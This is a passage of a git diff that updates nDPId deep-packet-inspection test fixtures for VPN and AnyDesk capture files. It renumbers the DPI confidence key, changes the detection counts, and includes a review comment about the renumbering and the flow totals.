{"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":3001,"packets-processed":2997,"total-skipped-flows":0,"total-l4-payload-len":880499,"total-not-detected-flows":3,"total-guessed-flows":6,"total-detected-flows":60,"total-detection-updates":33,"total-updates":0,"current-active-flows":0,"total-active-flows":69,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":398,"global_ts_msec":1569687289262} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":3001,"packets-processed":2997,"total-skipped-flows":0,"total-l4-payload-len":880499,"total-not-detected-flows":2,"total-guessed-flows":6,"total-detected-flows":61,"total-detection-updates":34,"total-updates":0,"current-active-flows":0,"total-active-flows":69,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":399,"global_ts_msec":1569687289262} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3001/2997 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 880499 bytes -~~ total detected protocols..: 60 +~~ total detected protocols..: 61 ~~ total active/idle flows...: 69/69 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6093183 bytes -~~ total memory freed........: 6093183 bytes -~~ total allocations/frees...: 121443/121443 +~~ total memory allocated....: 6226828 bytes +~~ total memory freed........: 6226828 bytes +~~ total allocations/frees...: 124206/124206 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json 
string min len.......: 451 chars ~~ json string max len.......: 1592 chars diff --git a/test/results/anydesk-2.pcap.out b/test/results/anydesk-2.pcap.out index 9b0349eb1..7b2ac4cc3 100644 --- a/test/results/anydesk-2.pcap.out +++ b/test/results/anydesk-2.pcap.out 
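Review bot: The numeric confidence key for `"DPI"` moves from `"4"` to `"6"` in every changed record of this hunk (for example flow_id 62 and flow_id 50), while `"1":"Match by port"` and `"2":"Match by IP"` in the nearby context lines keep their ids. The number is therefore not a stable identifier across libnDPI versions, and anything consuming this event stream (detection rules, log parsers, dashboards) should match on the string value. That is worth stating where the event schema is documented, e.g. `confidence ids follow the libnDPI enum and may be renumbered; match on the name`. Separately, flow_id 19 and flow_id 28 change from `"flow_state":"info"` with no `ndpi` object to `"finished"` with `MDNS` and `TLS.Slack`, yet the shutdown record moves `total-detected-flows` only from 60 to 61. The rest is presumably accounted for in records outside this hunk, which should be confirmed before accepting the regenerated fixture.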
@@ -2,30 +2,30 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613977585247} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613977585247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1613977585247,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C0AAIARAADAqAG7wKgBAeh3ADUAOIRW7CIBAAABAAAAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQAB"} 
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613977585260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585260,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcjnRAADkRLxDAqAEBwKgBuwA16HcASAAA7CKBgAABAAEAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAADSNAAEJT3fDw=="} -00809{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}} +00809{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613977585542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1613977585542,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C4AAIARAADAqAG7wKgBAdhQADUAOIRW6okBAAABAAAAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQAB"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": 
{"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613977585553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585553,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcBhBAADkRt3TAqAEBwKgBuwA12FAASAAA6omBgAABAAEAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAABtXAAEisckcw=="} 
-00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01481{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS 